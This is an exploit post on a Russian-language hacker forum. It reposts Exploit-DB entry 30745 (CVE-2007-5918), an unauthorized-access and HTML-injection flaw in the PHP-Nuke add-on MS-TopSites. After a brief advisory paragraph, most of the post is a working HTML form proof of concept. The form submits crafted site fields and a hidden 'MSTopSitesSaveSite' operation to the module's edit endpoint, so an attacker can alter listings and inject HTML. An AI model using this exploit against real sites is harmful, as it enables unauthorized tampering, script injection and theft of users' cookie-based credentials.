Exploit Weblord.it MS-TopSites - Unauthorized Access / HTML Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30745
Проверка EDB
  1. Пройдено
Автор
0X90
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-5918
Дата публикации
2007-11-06
HTML:
source: https://www.securityfocus.com/bid/26358/info

MS-TopSites is prone to an unauthorized-access vulnerability and an HTML-injection vulnerability because the application fails to sufficiently sanitize user-supplied data.

An attacker can exploit these issues to gain elevated privileges on the affected application, execute arbitrary code within the context of the webserver, and steal cookie-based authentication credentials. 

<html><title>PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection</title>
<body bgcolor="black" text="white">
<form action="http://localhost:81/modules.php?name=MS_TopSites&file=edit " method="post">
<input size="92" type="text" value=&#039;&#039; name="sname"> SiteNameTitle [sname] (not Target it must be changed in the source) <br />
<input size="92" type="text" value="" name="uname"> Username [uname] <br />
<input size="92" type="text" value=" http://www.0x90.com.ar" name="url"> Url<br />
<input size="92" type="text" value="[email protected]" name="email"> Email<br />
<input size="92" type="text" value=&#039;&#039; name="bottonurl"> BottonUrl<br />
<input size="92" type="text" value="Art" name="cat"> Cat <br />
<input size="92" type="text" value="Wedonotneeddescriptions" name="description"> Descriptions<br />
<input type="hidden" value="MSTopSitesSaveSite" name="op"><br />
<input type="submit" value="submit"><br />
</body></form>
</html>
 
Источник
www.exploit-db.com

Похожие темы